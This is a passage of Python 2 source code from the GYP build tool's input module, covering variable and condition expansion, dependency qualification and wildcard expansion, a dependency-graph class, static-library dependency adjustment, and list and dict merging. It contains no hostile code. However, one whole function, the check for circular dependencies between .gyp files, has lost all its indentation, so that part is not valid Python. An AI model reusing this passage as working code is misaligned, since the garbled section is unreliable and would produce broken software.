  LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
  # Process conditions in this dict.  This is done after variable expansion
  # so that conditions may take advantage of expanded variables.  For example,
  # if the_dict contains:
  #   {'type':       '<(library_type)',
  #    'conditions': [['_type=="static_library"', { ... }]]},
  # _type, as used in the condition, will only be set to the value of
  # library_type if variable expansion is performed before condition
  # processing.  However, condition processing should occur prior to recursion
  # so that variables (both automatic and "variables" dict type) may be
  # adjusted by conditions sections, merged into the_dict, and have the
  # intended impact on contained dicts.
  #
  # This arrangement means that a "conditions" section containing a
  # "variables" section will only have those variables effective in subdicts,
  # not in the_dict.  The workaround is to put a "conditions" section within a
  # "variables" section.  For example:
  #   {'conditions': [['os=="mac"', {'variables': {'define': 'IS_MAC'}}]],
  #    'defines':    ['<(define)'],
  #    'my_subdict': {'defines': ['<(define)']}},
  # will not result in "IS_MAC" being appended to the "defines" list in the
  # current scope but would result in it being appended to the "defines" list
  # within "my_subdict".  By comparison:
  #   {'variables': {'conditions': [['os=="mac"', {'define': 'IS_MAC'}]]},
  #    'defines':    ['<(define)'],
  #    'my_subdict': {'defines': ['<(define)']}},
  # will append "IS_MAC" to both "defines" lists.
  # Evaluate conditions sections, allowing variable expansions within them
  # as well as nested conditionals.  This will process a 'conditions' or
  # 'target_conditions' section, perform appropriate merging and recursive
  # conditional and variable processing, and then remove the conditions
  # section from the_dict if it is present.
  ProcessConditionsInDict(the_dict, phase, variables, build_file)
  # Conditional processing may have resulted in changes to automatics or the
  # variables dict.  Reload.
  variables = variables_in.copy()
  LoadAutomaticVariablesFromDict(variables, the_dict)
  LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
  # Recurse into child dicts, or process child lists which may result in
  # further recursion into descendant dicts.
  for key, value in the_dict.iteritems():
    # Skip "variables" and string values, which were already processed if
    # present.
    if key == 'variables' or isinstance(value, str):
      continue
    if isinstance(value, dict):
      # Pass a copy of the variables dict so that subdicts can't influence
      # parents.
      ProcessVariablesAndConditionsInDict(value, phase, variables,
                                          build_file, key)
    elif isinstance(value, list):
      # The list itself can't influence the variables dict, and
      # ProcessVariablesAndConditionsInList will make copies of the variables
      # dict if it needs to pass it to something that can influence it.  No
      # copy is necessary here.
      ProcessVariablesAndConditionsInList(value, phase, variables,
                                          build_file)
    elif not isinstance(value, int):
      # Any type other than dict, list, str, or int is not allowed here.
      raise TypeError, 'Unknown type ' + value.__class__.__name__ + \
                       ' for ' + key
def ProcessVariablesAndConditionsInList(the_list, phase, variables,
                                        build_file):
  """Expands variables and processes conditions in each item of the_list.

  Dict items are handed to ProcessVariablesAndConditionsInDict, list items
  are processed recursively, and string items are expanded with
  ExpandVariables.  When a string expands to a list, the result is spliced
  into the_list in place of the string that produced it.  the_list is
  modified in place.
  """
  # Iterate using an index so that new values can be assigned into the_list.
  index = 0
  while index < len(the_list):
    item = the_list[index]
    if isinstance(item, dict):
      # Make a copy of the variables dict so that it won't influence anything
      # outside of its own scope.
      ProcessVariablesAndConditionsInDict(item, phase, variables, build_file)
    elif isinstance(item, list):
      ProcessVariablesAndConditionsInList(item, phase, variables, build_file)
    elif isinstance(item, str):
      expanded = ExpandVariables(item, phase, variables, build_file)
      if isinstance(expanded, str) or isinstance(expanded, int):
        the_list[index] = expanded
      elif isinstance(expanded, list):
        the_list[index:index+1] = expanded
        index += len(expanded)
        # index now identifies the next item to examine.  Continue right now
        # without falling into the index increment below.
        continue
      else:
        # str(index) is required: concatenating the int index directly would
        # raise a TypeError and mask the real error being reported.
        raise ValueError(
            'Variable expansion in this context permits strings and ' +
            'lists only, found ' + expanded.__class__.__name__ + ' at ' +
            str(index))
    elif not isinstance(item, int):
      # str(index), as above, so the diagnostic itself doesn't blow up.
      raise TypeError('Unknown type ' + item.__class__.__name__ +
                      ' at index ' + str(index))
    index = index + 1
def BuildTargetsDict(data):
  """Builds a dict mapping fully-qualified target names to their target dicts.

  |data| is a dict mapping loaded build files by pathname relative to the
  current directory.  Values in |data| are build file contents.  For each
  |data| value with a "targets" key, the value of the "targets" key is taken
  as a list containing target dicts.  Each target's fully-qualified name is
  constructed from the pathname of the build file (|data| key) and its
  "target_name" property.  These fully-qualified names are used as the keys
  in the returned dict.  These keys provide access to the target dicts,
  the dicts in the "targets" lists.
  """
  targets = {}
  for build_file in data['target_build_files']:
    target_list = data[build_file].get('targets', [])
    for target in target_list:
      qualified_name = gyp.common.QualifiedTarget(
          build_file, target['target_name'], target['toolset'])
      # Two targets may not share one fully-qualified name.
      if qualified_name in targets:
        raise GypError('Duplicate target definitions for ' + qualified_name)
      targets[qualified_name] = target
  return targets
def QualifyDependencies(targets):
  """Make dependency links fully-qualified relative to the current directory.

  |targets| is a dict mapping fully-qualified target names to their target
  dicts.  For each target in this dict, keys known to contain dependency
  links are examined, and any dependencies referenced will be rewritten
  so that they are fully-qualified and relative to the current directory.
  All rewritten dependencies are suitable for use as keys to |targets| or a
  similar dict.
  """
  # Each dependency section may also appear with a "!" (exclusion) or "/"
  # (regex) suffix; all of those variants carry dependency links.
  dep_keys = []
  for section in dependency_sections:
    for suffix in ('', '!', '/'):
      dep_keys.append(section + suffix)

  for target, target_dict in targets.iteritems():
    target_build_file = gyp.common.BuildFile(target)
    toolset = target_dict['toolset']
    for dependency_key in dep_keys:
      dependencies = target_dict.get(dependency_key, [])
      for index, dep in enumerate(dependencies):
        dep_file, dep_target, dep_toolset = gyp.common.ResolveTarget(
            target_build_file, dep, toolset)
        if not multiple_toolsets:
          # Ignore toolset specification in the dependency if it is specified.
          dep_toolset = toolset
        dependency = gyp.common.QualifiedTarget(dep_file,
                                                dep_target,
                                                dep_toolset)
        dependencies[index] = dependency

        # Make sure anything appearing in a list other than "dependencies"
        # also appears in the "dependencies" list.
        if (dependency_key != 'dependencies' and
            dependency not in target_dict['dependencies']):
          raise GypError('Found ' + dependency + ' in ' + dependency_key +
                         ' of ' + target + ', but not in dependencies')
def ExpandWildcardDependencies(targets, data):
  """Expands dependencies specified as build_file:*.

  For each target in |targets|, examines sections containing links to other
  targets.  If any such section contains a link of the form build_file:*, it
  is taken as a wildcard link, and is expanded to list each target in
  build_file.  The |data| dict provides access to build file dicts.

  Any target that does not wish to be included by wildcard can provide an
  optional "suppress_wildcard" key in its target dict.  When present and
  true, a wildcard dependency link will not include such targets.

  All dependency names, including the keys to |targets| and the values in each
  dependency list, must be qualified when this function is called.
  Dependency lists are modified in place.
  """
  for target, target_dict in targets.iteritems():
    toolset = target_dict['toolset']
    target_build_file = gyp.common.BuildFile(target)
    for dependency_key in dependency_sections:
      dependencies = target_dict.get(dependency_key, [])
      # Loop this way instead of "for dependency in" or "for index in xrange"
      # because the dependencies list will be modified within the loop body.
      index = 0
      while index < len(dependencies):
        (dependency_build_file, dependency_target, dependency_toolset) = \
            gyp.common.ParseQualifiedTarget(dependencies[index])
        # A "*" target or toolset component marks a wildcard link.
        if dependency_target != '*' and dependency_toolset != '*':
          # Not a wildcard.  Keep it moving.
          index = index + 1
          continue
        if dependency_build_file == target_build_file:
          # It's an error for a target to depend on all other targets in
          # the same file, because a target cannot depend on itself.
          raise GypError('Found wildcard in ' + dependency_key + ' of ' +
                         target + ' referring to same build file')
        # Take the wildcard out and adjust the index so that the next
        # dependency in the list will be processed the next time through the
        # loop.
        del dependencies[index]
        index = index - 1
        # Loop through the targets in the other build file, adding them to
        # this target's list of dependencies in place of the removed
        # wildcard.
        dependency_target_dicts = data[dependency_build_file]['targets']
        for dependency_target_dict in dependency_target_dicts:
          # Skip targets that opt out of wildcard expansion.  The int()
          # coercion presumably normalizes values that may be numeric
          # strings after variable expansion — confirm with callers.
          if int(dependency_target_dict.get('suppress_wildcard', False)):
            continue
          dependency_target_name = dependency_target_dict['target_name']
          if (dependency_target != '*' and
              dependency_target != dependency_target_name):
            continue
          dependency_target_toolset = dependency_target_dict['toolset']
          if (dependency_toolset != '*' and
              dependency_toolset != dependency_target_toolset):
            continue
          dependency = gyp.common.QualifiedTarget(dependency_build_file,
                                                  dependency_target_name,
                                                  dependency_target_toolset)
          # Insert after the current position so expanded entries keep the
          # order of the build file's target list; advancing index here
          # means they are not re-examined as wildcards.
          index = index + 1
          dependencies.insert(index, dependency)

        index = index + 1
def Unify(l):
  """Returns l with duplicates removed, preserving first occurrences."""
  seen = set()
  unique = []
  for element in l:
    if element not in seen:
      seen.add(element)
      unique.append(element)
  return unique
def RemoveDuplicateDependencies(targets):
  """Ensures each dependency appears at most once in every target's
  dependency lists."""
  for target_dict in targets.itervalues():
    for key in dependency_sections:
      deps = target_dict.get(key)
      if deps:
        target_dict[key] = Unify(deps)
def Filter(l, item):
  """Returns a new list containing the elements of l not equal to item."""
  # A plain comprehension suffices here; the previous dict-based form added
  # an unnecessary hashability requirement on the elements.
  return [element for element in l if element != item]
def RemoveSelfDependencies(targets):
  """Removes a target's dependency on itself when that target sets the
  prune_self_dependency variable."""
  for target_name, target_dict in targets.iteritems():
    for dependency_key in dependency_sections:
      dependencies = target_dict.get(dependency_key, [])
      if target_name not in dependencies:
        continue
      variables = target_dict.get('variables', {})
      if variables.get('prune_self_dependency', 0):
        target_dict[dependency_key] = Filter(dependencies, target_name)
class DependencyGraphNode(object):
  """A node in the dependency graph built over targets or build files.

  Attributes:
    ref: A reference to an object that this DependencyGraphNode represents.
    dependencies: List of DependencyGraphNodes on which this one depends.
    dependents: List of DependencyGraphNodes that depend on this one.
  """

  class CircularException(GypError):
    """Raised when a cycle is detected in the dependency graph."""
    pass

  def __init__(self, ref):
    self.ref = ref
    self.dependencies = []
    self.dependents = []

  def __repr__(self):
    return '<DependencyGraphNode: %r>' % self.ref

  def FlattenToList(self):
    """Topologically sorts the graph rooted at this node.

    Returns a list of the "ref" attributes of the reachable nodes, ordered
    so that every ref appears after all of its dependencies and before all
    of its dependents.
    """
    # flat_list is the sorted list of dependencies - actually, the list items
    # are the "ref" attributes of DependencyGraphNodes.  Every target will
    # appear in flat_list after all of its dependencies, and before all of
    # its dependents.
    flat_list = []

    # in_degree_zeros is the list of DependencyGraphNodes that have no
    # dependencies not in flat_list.  Initially, it is a copy of the children
    # of this node, because when the graph was built, nodes with no
    # dependencies were made implicit dependents of the root node.
    in_degree_zeros = set(self.dependents[:])

    while in_degree_zeros:
      # Nodes in in_degree_zeros have no dependencies not in flat_list, so
      # they can be appended to flat_list.  Take these nodes out of
      # in_degree_zeros as work progresses, so that the next node to process
      # from the list can always be accessed at a consistent position.
      node = in_degree_zeros.pop()
      flat_list.append(node.ref)

      # Look at dependents of the node just added to flat_list.  Some of them
      # may now belong in in_degree_zeros.
      for node_dependent in node.dependents:
        is_in_degree_zero = True
        for node_dependent_dependency in node_dependent.dependencies:
          if not node_dependent_dependency.ref in flat_list:
            # The dependent has one or more dependencies not in flat_list.
            # There will be more chances to add it to flat_list when
            # examining it again as a dependent of those other dependencies,
            # provided that there are no cycles.
            is_in_degree_zero = False
            break

        if is_in_degree_zero:
          # All of the dependent's dependencies are already in flat_list.
          # Add it to in_degree_zeros where it will be processed in a future
          # iteration of the outer loop.
          in_degree_zeros.add(node_dependent)

    return flat_list

  def FindCycles(self, path=None):
    """
    Returns a list of cycles in the graph, where each cycle is its own list.
    """
    if path is None:
      path = [self]

    results = []
    for node in self.dependents:
      if node in path:
        cycle = [node]
        for part in path:
          cycle.append(part)
          if part == node:
            break
        results.append(tuple(cycle))
      else:
        results.extend(node.FindCycles([node] + path))

    return list(set(results))

  def DirectDependencies(self, dependencies=None):
    """Returns a list of just direct dependencies."""
    # "is None" rather than "== None": identity comparison is the correct
    # (and PEP 8-mandated) way to detect the missing-argument sentinel.
    if dependencies is None:
      dependencies = []

    for dependency in self.dependencies:
      # Check for None, corresponding to the root node.
      if dependency.ref is not None and dependency.ref not in dependencies:
        dependencies.append(dependency.ref)

    return dependencies

  def _AddImportedDependencies(self, targets, dependencies=None):
    """Given a list of direct dependencies, adds indirect dependencies that
    other dependencies have declared to export their settings.

    This method does not operate on self.  Rather, it operates on the list
    of dependencies in the |dependencies| argument.  For each dependency in
    that list, if any declares that it exports the settings of one of its
    own dependencies, those dependencies whose settings are "passed through"
    are added to the list.  As new items are added to the list, they too will
    be processed, so it is possible to import settings through multiple
    levels of dependencies.

    This method is not terribly useful on its own, it depends on being
    "primed" with a list of direct dependencies such as one provided by
    DirectDependencies.  DirectAndImportedDependencies is intended to be the
    public entry point.
    """
    if dependencies is None:
      dependencies = []

    index = 0
    while index < len(dependencies):
      dependency = dependencies[index]
      dependency_dict = targets[dependency]
      # Add any dependencies whose settings should be imported to the list
      # if not already present.  Newly-added items will be checked for
      # their own imports when the list iteration reaches them.
      # Rather than simply appending new items, insert them after the
      # dependency that exported them.  This is done to more closely match
      # the depth-first method used by DeepDependencies.
      add_index = 1
      for imported_dependency in \
          dependency_dict.get('export_dependent_settings', []):
        if imported_dependency not in dependencies:
          dependencies.insert(index + add_index, imported_dependency)
          add_index = add_index + 1
      index = index + 1

    return dependencies

  def DirectAndImportedDependencies(self, targets, dependencies=None):
    """Returns a list of a target's direct dependencies and all indirect
    dependencies that a dependency has advertised settings should be exported
    through the dependency for.
    """
    dependencies = self.DirectDependencies(dependencies)
    return self._AddImportedDependencies(targets, dependencies)

  def DeepDependencies(self, dependencies=None):
    """Returns a list of all of a target's dependencies, recursively."""
    if dependencies is None:
      dependencies = []

    for dependency in self.dependencies:
      # Check for None, corresponding to the root node.
      if dependency.ref is not None and dependency.ref not in dependencies:
        dependencies.append(dependency.ref)
        dependency.DeepDependencies(dependencies)

    return dependencies

  def _LinkDependenciesInternal(self, targets, include_shared_libraries,
                                dependencies=None, initial=True):
    """Returns a list of dependency targets that are linked into this target.

    This function has a split personality, depending on the setting of
    |initial|.  Outside callers should always leave |initial| at its default
    setting.

    When adding a target to the list of dependencies, this function will
    recurse into itself with |initial| set to False, to collect dependencies
    that are linked into the linkable target for which the list is being
    built.

    If |include_shared_libraries| is False, the resulting dependencies will
    not include shared_library targets that are linked into this target.
    """
    if dependencies is None:
      dependencies = []

    # Check for None, corresponding to the root node.
    if self.ref is None:
      return dependencies

    # It's kind of sucky that |targets| has to be passed into this function,
    # but that's presently the easiest way to access the target dicts so that
    # this function can find target types.
    if 'target_name' not in targets[self.ref]:
      raise GypError("Missing 'target_name' field in target.")

    if 'type' not in targets[self.ref]:
      raise GypError("Missing 'type' field in target %s" %
                     targets[self.ref]['target_name'])

    target_type = targets[self.ref]['type']
    is_linkable = target_type in linkable_types

    if initial and not is_linkable:
      # If this is the first target being examined and it's not linkable,
      # return an empty list of link dependencies, because the link
      # dependencies are intended to apply to the target itself (initial is
      # True) and this target won't be linked.
      return dependencies

    # Don't traverse 'none' targets if explicitly excluded.
    if (target_type == 'none' and
        not targets[self.ref].get('dependencies_traverse', True)):
      if self.ref not in dependencies:
        dependencies.append(self.ref)
      return dependencies

    # Executables and loadable modules are already fully and finally linked.
    # Nothing else can be a link dependency of them, there can only be
    # dependencies in the sense that a dependent target might run an
    # executable or load the loadable_module.
    if not initial and target_type in ('executable', 'loadable_module'):
      return dependencies

    # Shared libraries are already fully linked.  They should only be
    # included in |dependencies| when adjusting static library dependencies
    # (in order to link against the shared_library's import lib), but should
    # not be included in |dependencies| when propagating link_settings.
    # The |include_shared_libraries| flag controls which of these two cases
    # we are handling.
    if (not initial and target_type == 'shared_library' and
        not include_shared_libraries):
      return dependencies

    # The target is linkable, add it to the list of link dependencies.
    if self.ref not in dependencies:
      dependencies.append(self.ref)
      if initial or not is_linkable:
        # If this is a subsequent target and it's linkable, don't look any
        # further for linkable dependencies, as they'll already be linked
        # into this target linkable.  Always look at dependencies of the
        # initial target, and always look at dependencies of non-linkables.
        for dependency in self.dependencies:
          dependency._LinkDependenciesInternal(targets,
                                               include_shared_libraries,
                                               dependencies, False)

    return dependencies

  def DependenciesForLinkSettings(self, targets):
    """
    Returns a list of dependency targets whose link_settings should be merged
    into this target.
    """
    # TODO(sbaig) Currently, chrome depends on the bug that shared libraries'
    # link_settings are propagated.  So for now, we will allow it, unless the
    # 'allow_sharedlib_linksettings_propagation' flag is explicitly set to
    # False.  Once chrome is fixed, we can remove this flag.
    include_shared_libraries = \
        targets[self.ref].get('allow_sharedlib_linksettings_propagation', True)
    return self._LinkDependenciesInternal(targets, include_shared_libraries)

  def DependenciesToLinkAgainst(self, targets):
    """
    Returns a list of dependency targets that are linked into this target.
    """
    return self._LinkDependenciesInternal(targets, True)
def BuildDependencyList(targets):
  """Creates a DependencyGraphNode for each target and links them together.

  |targets| maps fully-qualified target names to target dicts.  Returns a
  two-element list: a dict mapping each target name to its
  DependencyGraphNode, and a flat list of target names sorted so that every
  target appears after its dependencies (see
  DependencyGraphNode.FlattenToList).

  Raises:
    GypError: If a target names a dependency that is not in |targets|.
    DependencyGraphNode.CircularException: If the graph contains a cycle.
  """
  # Create a DependencyGraphNode for each target.  Put it into a dict for
  # easy access.
  dependency_nodes = {}
  for target in targets.iterkeys():
    if target not in dependency_nodes:
      dependency_nodes[target] = DependencyGraphNode(target)

  # Set up the dependency links.  Targets that have no dependencies are
  # treated as dependent on root_node.
  root_node = DependencyGraphNode(None)
  for target, spec in targets.iteritems():
    # NOTE: the former unused "target_build_file" local was removed here.
    target_node = dependency_nodes[target]
    dependencies = spec.get('dependencies')
    if not dependencies:
      target_node.dependencies = [root_node]
      root_node.dependents.append(target_node)
    else:
      for dependency in dependencies:
        dependency_node = dependency_nodes.get(dependency)
        if not dependency_node:
          raise GypError("Dependency '%s' not found while "
                         "trying to load target %s" % (dependency, target))
        target_node.dependencies.append(dependency_node)
        dependency_node.dependents.append(target_node)

  flat_list = root_node.FlattenToList()

  # If there's anything left unvisited, there must be a circular dependency
  # (cycle).  If you need to figure out what's wrong, look for elements of
  # targets that are not in flat_list.
  if len(flat_list) != len(targets):
    raise DependencyGraphNode.CircularException(
        'Some targets not reachable, cycle in dependency graph detected: ' +
        ' '.join(set(flat_list) ^ set(targets)))

  return [dependency_nodes, flat_list]
def VerifyNoGYPFileCircularDependencies(targets):
# Create a DependencyGraphNode for each gyp file containing a target. Put
# it into a dict for easy access.
dependency_nodes = {}
for target in targets.iterkeys():
build_file = gyp.common.BuildFile(target)
if not build_file in dependency_nodes:
dependency_nodes[build_file] = DependencyGraphNode(build_file)
# Set up the dependency links.
for target, spec in targets.iteritems():
build_file = gyp.common.BuildFile(target)
build_file_node = dependency_nodes[build_file]
target_dependencies = spec.get('dependencies', [])
for dependency in target_dependencies:
try:
dependency_build_file = gyp.common.BuildFile(dependency)
except GypError, e:
gyp.common.ExceptionAppend(
e, 'while computing dependencies of .gyp file %s' % build_file)
raise
if dependency_build_file == build_file:
# A .gyp file is allowed to refer back to itself.
continue
dependency_node = dependency_nodes.get(dependency_build_file)
if not dependency_node:
raise GypError("Dependancy '%s' not found" % dependency_build_file)
if dependency_node not in build_file_node.dependencies:
build_file_node.dependencies.append(dependency_node)
dependency_node.dependents.append(build_file_node)
# Files that have no dependencies are treated as dependent on root_node.
root_node = DependencyGraphNode(None)
for build_file_node in dependency_nodes.itervalues():
if len(build_file_node.dependencies) == 0:
build_file_node.dependencies.append(root_node)
root_node.dependents.append(build_file_node)
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle).
if len(flat_list) != len(dependency_nodes):
bad_files = []
for file in dependency_nodes.iterkeys():
if not file in flat_list:
bad_files.append(file)
common_path_prefix = os.path.commonprefix(dependency_nodes)
cycles = []
for cycle in root_node.FindCycles():
simplified_paths = []
for node in cycle:
assert(node.ref.startswith(common_path_prefix))
simplified_paths.append(node.ref[len(common_path_prefix):])
cycles.append('Cycle: %s' % ' -> '.join(simplified_paths))
raise DependencyGraphNode.CircularException, \
'Cycles in .gyp file dependency graph detected:\n' + '\n'.join(cycles)
def DoDependentSettings(key, flat_list, targets, dependency_nodes):
  """Merges each target's dependencies' |key| sections into the target.

  key must be one of 'all_dependent_settings', 'direct_dependent_settings',
  or 'link_settings'; it selects how the set of contributing dependencies is
  computed for each target in flat_list.
  """
  for target in flat_list:
    target_dict = targets[target]
    build_file = gyp.common.BuildFile(target)
    node = dependency_nodes[target]

    if key == 'all_dependent_settings':
      dependencies = node.DeepDependencies()
    elif key == 'direct_dependent_settings':
      dependencies = node.DirectAndImportedDependencies(targets)
    elif key == 'link_settings':
      dependencies = node.DependenciesForLinkSettings(targets)
    else:
      raise GypError("DoDependentSettings doesn't know how to determine "
                     'dependencies for ' + key)

    for dependency in dependencies:
      dependency_dict = targets[dependency]
      if key in dependency_dict:
        dependency_build_file = gyp.common.BuildFile(dependency)
        MergeDicts(target_dict, dependency_dict[key],
                   build_file, dependency_build_file)
def AdjustStaticLibraryDependencies(flat_list, targets, dependency_nodes,
                                    sort_dependencies):
  """Recomputes each target's "dependencies" list for linking purposes.

  For each static library target, removes "dependencies" entries referring
  to other static libraries, unless the dependency has the
  "hard_dependency" attribute set.  For each linkable target, adds a
  "dependencies" entry referring to all of the target's computed list of
  link dependencies (including static libraries) if no such entry is
  already present.  Target dicts are modified in place.
  """
  for target in flat_list:
    target_dict = targets[target]
    target_type = target_dict['type']

    if target_type == 'static_library':
      if not 'dependencies' in target_dict:
        continue

      # Save a copy of the unmodified list as "dependencies_original" —
      # presumably for consumers that need the pre-pruning list; confirm
      # with generators that read this key.
      target_dict['dependencies_original'] = target_dict.get(
          'dependencies', [])[:]

      # A static library should not depend on another static library unless
      # the dependency relationship is "hard," which should only be done
      # when a dependent relies on some side effect other than just the
      # build product, like a rule or action output.  Further, if a target
      # has a non-hard dependency, but that dependency exports a hard
      # dependency, the non-hard dependency can safely be removed, but the
      # exported hard dependency must be added to the target to keep the
      # same dependency ordering.
      dependencies = \
          dependency_nodes[target].DirectAndImportedDependencies(targets)
      index = 0
      while index < len(dependencies):
        dependency = dependencies[index]
        dependency_dict = targets[dependency]

        # Remove every non-hard static library dependency and remove every
        # non-static library dependency that isn't a direct dependency.
        if (dependency_dict['type'] == 'static_library' and \
            not dependency_dict.get('hard_dependency', False)) or \
           (dependency_dict['type'] != 'static_library' and \
            not dependency in target_dict['dependencies']):
          # Take the dependency out of the list, and don't increment index
          # because the next dependency to analyze will shift into the index
          # formerly occupied by the one being removed.
          del dependencies[index]
        else:
          index = index + 1

      # Update the dependencies.  If the dependencies list is empty, it's
      # not needed, so unhook it.
      if len(dependencies) > 0:
        target_dict['dependencies'] = dependencies
      else:
        del target_dict['dependencies']

    elif target_type in linkable_types:
      # Get a list of dependency targets that should be linked into this
      # target.  Add them to the dependencies list if they're not already
      # present.
      link_dependencies = \
          dependency_nodes[target].DependenciesToLinkAgainst(targets)
      for dependency in link_dependencies:
        # A target never links against itself.
        if dependency == target:
          continue
        if not 'dependencies' in target_dict:
          target_dict['dependencies'] = []
        if not dependency in target_dict['dependencies']:
          target_dict['dependencies'].append(dependency)
      # Sort the dependencies list in the order from dependents to
      # dependencies.  e.g. If A and B depend on C and C depends on D, sort
      # them in A, B, C, D.
      # Note: flat_list is already sorted in the order from dependencies to
      # dependents.
      if sort_dependencies and 'dependencies' in target_dict:
        target_dict['dependencies'] = [dep for dep in reversed(flat_list)
                                       if dep in target_dict['dependencies']]
# Initialize this here to speed up MakePathRelative.
# Matches items that MakePathRelative must return unmodified: an optional
# leading quote character followed by one of the special prefix characters
# ("-", "/", "$", "<", ">", "^") documented in MakePathRelative.
exception_re = re.compile(r'''["']?[-/$<>^]''')
def MakePathRelative(to_file, fro_file, item):
  """Returns |item| rewritten to be relative to |to_file|'s directory.

  If item is a relative path, it's relative to the build file dict that it's
  coming from.  Fix it up to make it relative to the build file dict that
  it's going into.

  Exception: any |item| that begins with these special characters is
  returned without modification.

  /   Used when a path is already absolute (shortcut optimization;
      such paths would be returned as absolute anyway)
  $   Used for build environment variables
  -   Used for some build environment flags (such as -lapr-1 in a
      "libraries" section)
  <   Used for our own variable and command expansions (see ExpandVariables)
  >   Used for our own variable and command expansions (see ExpandVariables)
  ^   Used for our own variable and command expansions (see ExpandVariables)

  "/' Used when a value is quoted.  If these are present, then we
      check the second character instead.
  """
  if to_file == fro_file or exception_re.match(item):
    return item
  else:
    # TODO(dglazkov) The backslash/forward-slash replacement at the end is a
    # temporary measure. This should really be addressed by keeping all paths
    # in POSIX until actual project generation.
    ret = os.path.normpath(os.path.join(
        gyp.common.RelativePath(os.path.dirname(fro_file),
                                os.path.dirname(to_file)),
        item)).replace('\\', '/')
    # endswith rather than item[-1]: an empty item must not raise
    # IndexError.  normpath strips a trailing slash, so restore it.
    if item.endswith('/'):
      ret += '/'
    return ret
def MergeLists(to, fro, to_file, fro_file, is_paths=False, append=True):
  """Merges list |fro| into list |to|, in place.

  Dict and list items are deep-copied (via MergeDicts/MergeLists) rather than
  shared.  When |is_paths| is true, string items are rebased from
  |fro_file|'s directory to |to_file|'s with MakePathRelative.  When |append|
  is false, items are prepended (in their original order) instead of
  appended.  "Singleton" items — everything except strings beginning with
  '-' — are kept unique within |to|.

  Raises:
    TypeError: if |fro| contains an item that is not a str, int, dict, or
        list.
  """
  # Python documentation recommends objects which do not support hash
  # set this value to None. Python library objects follow this rule.
  is_hashable = lambda val: val.__hash__
  # If x is hashable, returns whether x is in s. Else returns whether x is in l.
  def is_in_set_or_list(x, s, l):
    if is_hashable(x):
      return x in s
    return x in l
  # Insertion point for prepends; advances so prepended items keep their
  # relative order instead of ending up reversed.
  prepend_index = 0
  # Make membership testing of hashables in |to| (in particular, strings)
  # faster.
  hashable_to_set = set(x for x in to if is_hashable(x))
  for item in fro:
    singleton = False
    if isinstance(item, str) or isinstance(item, int):
      # The cheap and easy case.
      if is_paths:
        to_item = MakePathRelative(to_file, fro_file, item)
      else:
        to_item = item
      if not isinstance(item, str) or not item.startswith('-'):
        # Any string that doesn't begin with a "-" is a singleton - it can
        # only appear once in a list, to be enforced by the list merge append
        # or prepend.
        singleton = True
    elif isinstance(item, dict):
      # Make a copy of the dictionary, continuing to look for paths to fix.
      # The other intelligent aspects of merge processing won't apply because
      # item is being merged into an empty dict.
      to_item = {}
      MergeDicts(to_item, item, to_file, fro_file)
    elif isinstance(item, list):
      # Recurse, making a copy of the list. If the list contains any
      # descendant dicts, path fixing will occur. Note that here, custom
      # values for is_paths and append are dropped; those are only to be
      # applied to |to| and |fro|, not sublists of |fro|. append shouldn't
      # matter anyway because the new |to_item| list is empty.
      to_item = []
      MergeLists(to_item, item, to_file, fro_file)
    else:
      raise TypeError, \
          'Attempt to merge list item of unsupported type ' + \
          item.__class__.__name__
    if append:
      # If appending a singleton that's already in the list, don't append.
      # This ensures that the earliest occurrence of the item will stay put.
      if not singleton or not is_in_set_or_list(to_item, hashable_to_set, to):
        to.append(to_item)
        if is_hashable(to_item):
          hashable_to_set.add(to_item)
    else:
      # If prepending a singleton that's already in the list, remove the
      # existing instance and proceed with the prepend. This ensures that the
      # item appears at the earliest possible position in the list.
      while singleton and to_item in to:
        to.remove(to_item)
      # Don't just insert everything at index 0. That would prepend the new
      # items to the list in reverse order, which would be an unwelcome
      # surprise.
      to.insert(prepend_index, to_item)
      if is_hashable(to_item):
        hashable_to_set.add(to_item)
      prepend_index = prepend_index + 1
def MergeDicts(to, fro, to_file, fro_file):
  """Merges dict |fro| into dict |to|, in place, copying nested containers.

  Scalar (str/int) values overwrite existing values; dict values merge
  recursively; list values merge through MergeLists with a policy chosen by
  the from-key's suffix character ('=' replace, '+' prepend, '?' only if
  absent, no suffix append).  Values in path sections (IsPathSection) are
  rebased from |fro_file|'s directory to |to_file|'s.

  Raises:
    TypeError: on an attempt to merge incompatible or unsupported types.
    GypError: when incompatible list-merge policies appear together in |fro|.
  """
  # I wanted to name the parameter "from" but it's a Python keyword...
  for k, v in fro.iteritems():
    # It would be nice to do "if not k in to: to[k] = v" but that wouldn't give
    # copy semantics. Something else may want to merge from the |fro| dict
    # later, and having the same dict ref pointed to twice in the tree isn't
    # what anyone wants considering that the dicts may subsequently be
    # modified.
    if k in to:
      bad_merge = False
      if isinstance(v, str) or isinstance(v, int):
        if not (isinstance(to[k], str) or isinstance(to[k], int)):
          bad_merge = True
      elif v.__class__ != to[k].__class__:
        bad_merge = True
      if bad_merge:
        raise TypeError, \
            'Attempt to merge dict value of type ' + v.__class__.__name__ + \
            ' into incompatible type ' + to[k].__class__.__name__ + \
            ' for key ' + k
    if isinstance(v, str) or isinstance(v, int):
      # Overwrite the existing value, if any. Cheap and easy.
      is_path = IsPathSection(k)
      if is_path:
        to[k] = MakePathRelative(to_file, fro_file, v)
      else:
        to[k] = v
    elif isinstance(v, dict):
      # Recurse, guaranteeing copies will be made of objects that require it.
      if not k in to:
        to[k] = {}
      MergeDicts(to[k], v, to_file, fro_file)
    elif isinstance(v, list):
      # Lists in dicts can be merged with different policies, depending on
      # how the key in the "from" dict (k, the from-key) is written.
      #
      # If the from-key has          ...the to-list will have this action
      # this character appended:...  applied when receiving the from-list:
      #                           =  replace
      #                           +  prepend
      #                           ?  set, only if to-list does not yet exist
      #                      (none)  append
      #
      # This logic is list-specific, but since it relies on the associated
      # dict key, it's checked in this dict-oriented function.
      ext = k[-1]
      append = True
      if ext == '=':
        list_base = k[:-1]
        lists_incompatible = [list_base, list_base + '?']
        to[list_base] = []
      elif ext == '+':
        list_base = k[:-1]
        lists_incompatible = [list_base + '=', list_base + '?']
        append = False
      elif ext == '?':
        list_base = k[:-1]
        lists_incompatible = [list_base, list_base + '=', list_base + '+']
      else:
        list_base = k
        lists_incompatible = [list_base + '=', list_base + '?']
      # Some combinations of merge policies appearing together are meaningless.
      # It's stupid to replace and append simultaneously, for example. Append
      # and prepend are the only policies that can coexist.
      for list_incompatible in lists_incompatible:
        if list_incompatible in fro:
          raise GypError('Incompatible list policies ' + k + ' and ' +
                         list_incompatible)
      if list_base in to:
        if ext == '?':
